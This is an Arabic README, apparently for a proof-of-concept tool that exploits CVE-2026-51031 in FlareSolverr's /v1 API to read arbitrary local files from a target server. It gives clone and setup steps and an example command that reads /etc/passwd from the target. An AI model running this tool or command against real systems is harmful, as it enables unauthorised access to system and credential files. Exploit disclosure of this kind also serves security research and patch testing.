
POC لـ CVE-2026-51031 لقراءة أي ملف محلي
flar3ad هي أداة تستغل الثغرة CVE-2026-51031 لقراءة الملفات من الخادم الهدف، وذلك بالاستفادة من مسار /v1 في واجهة برمجة تطبيقات FlareSolverr واستخدام دالة driver.get() لاستغلال الثغرة. مزيد من التفاصيل في مدونة xinyi.
git clone https://github.com/daemoncibsec/flar3ad.git
cd flar3ad
python3 -m venv venv
source venv/bin/activate
pip install rich
pip install argparse
pip install requests
chmod +x flar3ad
للخروج من البيئة الافتراضية:
deactivate
قراءة ملف /etc/passwd من الخادم الهدف.
./flar3ad http://localhost:8191/ /etc/passwd